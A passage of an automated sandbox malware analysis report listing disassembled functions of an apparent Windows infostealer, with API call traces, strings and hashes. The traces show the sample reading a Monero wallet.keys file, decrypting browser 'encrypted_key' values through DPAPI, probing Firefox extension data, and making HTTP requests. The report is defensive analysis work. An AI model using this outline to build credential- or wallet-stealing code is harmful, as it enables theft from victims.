Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BEA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 00BEA3FF
lstrlen.KERNEL32(00000000), ref: 00BEA6BC

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

DeleteFileA.KERNEL32(00000000), ref: 00BEA743

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 8b67378e65f8484f78aea791b7626dcff0c095cd1d7c32e91ffa79c26903f6d2
Instruction ID: 26d76933853d805b8d1e4f45e6922147b0d0a965d3a97e8f29ee8da936738749
Opcode Fuzzy Hash: 8b67378e65f8484f78aea791b7626dcff0c095cd1d7c32e91ffa79c26903f6d2
Instruction Fuzzy Hash: CAE1C1B281010C9BDB19EBA4DC91EFE73B8AF14340F5481A9F61A77091DF706A4DCB62

Function 00BED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,0173A670,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BED801
lstrlen.KERNEL32(00000000), ref: 00BED99F
lstrlen.KERNEL32(00000000), ref: 00BED9B3
DeleteFileA.KERNEL32(00000000), ref: 00BEDA32

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e383d500f3b5451805403e6b40d6752bf931d482d27d6cf85b98a7a3428853c8
Instruction ID: bd95615a0989c3f4c6b142bf01339bd7fe202366fb83d3ba0ae2300bc4c8a92a
Opcode Fuzzy Hash: e383d500f3b5451805403e6b40d6752bf931d482d27d6cf85b98a7a3428853c8
Instruction Fuzzy Hash: 8A81BDB191010C9BDB18EBA4DC56DFE73B8AF14340F5485A9F60AB7091EF746A0DCB62

Function 00BEF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A

Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C01580,00C00D92), ref: 00BEF54C
lstrlen.KERNEL32(00000000), ref: 00BEF56B

Strings

moz-extension+++, xrefs: 00BEF5AD
^userContextId=4294967295, xrefs: 00BEF59C

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 86d40c88f71fd0e97b12d7d71995c1a13aa41b9a409aa119910588cc5503961e
Instruction ID: eca33bde6535c4470873d54e4e456c6c8bd132d2505820970f73e6dd970f7e47
Opcode Fuzzy Hash: 86d40c88f71fd0e97b12d7d71995c1a13aa41b9a409aa119910588cc5503961e
Instruction Fuzzy Hash: 7F5111B1D0010DAADB08FBA4DC52DFDB3B8AF54340F408568F91A67195EF746A0DCBA2

Function 00BE9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A

Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BE9D39

Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
Part of subcall function 00BE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
Part of subcall function 00BE9AC0: LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F

Part of subcall function 00BE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE9B84
Part of subcall function 00BE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BE9BA3
Part of subcall function 00BE9B60: LocalFree.KERNEL32(?), ref: 00BE9BD3

Strings

, xrefs: 00BE9DC1
"encrypted_key":", xrefs: 00BE9D30
DPAPI, xrefs: 00BE9D89

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 05818cfe315f2e69cef72c368e34d38ffdc6ac4465983b9503f2f5219f78225a
Instruction ID: 2aac0bec130077521668e7d9379696893a8fc13ddf884e7bca79ec07ba6c2bba
Opcode Fuzzy Hash: 05818cfe315f2e69cef72c368e34d38ffdc6ac4465983b9503f2f5219f78225a
Instruction Fuzzy Hash: 27311EB5D10219ABCF14DBE5DC85AEEB7F8EB48304F148569E905A7241E7349A08CBA1

Function 00BF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01739180,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BF6AE8
CloseHandle.KERNEL32(00000000), ref: 00BF6AF9
Sleep.KERNEL32(00001770), ref: 00BF6B04
CloseHandle.KERNEL32(?,00000000,?,01739180,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6B1A
ExitProcess.KERNEL32 ref: 00BF6B22

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 3c3951f322545e1641ce48d8d1055f6d0db2d6d61719c1aab4f443b7b85586af
Instruction ID: c74bcd563735bdf080d5854ef0a6850e126d515724da60c761857ddf114d233d
Opcode Fuzzy Hash: 3c3951f322545e1641ce48d8d1055f6d0db2d6d61719c1aab4f443b7b85586af
Instruction Fuzzy Hash: 55F03A7094020DAFE720ABA09C4ABBD7BB4EB04701F1445A5BB02A3182CBB0554DD656

Function 00BE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849

Strings

<, xrefs: 00BE47C9

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 3108481efd9d6035c6a214a3ebefcc7a0892823135c11cc177bfedeb7853b853
Instruction ID: a3e4c36d4a8c5e4afc92138e46bdcf5ba0a89c4ba735ff729f585a18e975864f
Opcode Fuzzy Hash: 3108481efd9d6035c6a214a3ebefcc7a0892823135c11cc177bfedeb7853b853
Instruction Fuzzy Hash: EC214FB1D00209ABDF14DFA5E845ADE7B74FB44320F108625FA19B72C1EB706A09CF91

Function 00BF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE6280: InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
Part of subcall function 00BE6280: StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE6303
Part of subcall function 00BE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
Part of subcall function 00BE6280: HttpOpenRequestA.WININET(00000000,GET,?,0173E1F8,00000000,00000000,00400100,00000000), ref: 00BE6385
Part of subcall function 00BE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
Part of subcall function 00BE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5228

Strings

ERROR, xrefs: 00BF5273
ERROR, xrefs: 00BF521A

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
